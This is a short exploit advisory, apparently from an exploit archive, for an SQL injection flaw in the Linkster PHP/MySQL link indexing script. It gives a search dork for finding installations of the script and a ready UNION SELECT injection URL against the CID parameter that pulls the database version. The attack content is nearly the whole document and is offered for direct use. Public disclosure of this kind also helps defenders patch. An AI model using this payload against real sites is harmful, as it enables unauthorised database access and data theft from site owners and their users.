id: 10269
date: 12/15/2009
title: Linkster PHP/MySQL SQL Injection Vulnerability
author: Angela Zhang
cves: 

==============================================
Linkster PHP/MySQL SQL Injection Vulnerability
==============================================

(o)=====================================================================================(o)
 
         -:-    Linkster - a PHP/MySQL link indexing script  SQL Injection Vulnerability    -:-
 
 
                Vendor   : http://gliebster.com
(o)======================================================================================(o)
 
 
Dork   :
    
       Powered by Linkster
 
 
Vulnerabilities   :
 
      http://server/path/linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--
 
(o)===========================================================================================(o)



#  0day.today [2023-03-25]  #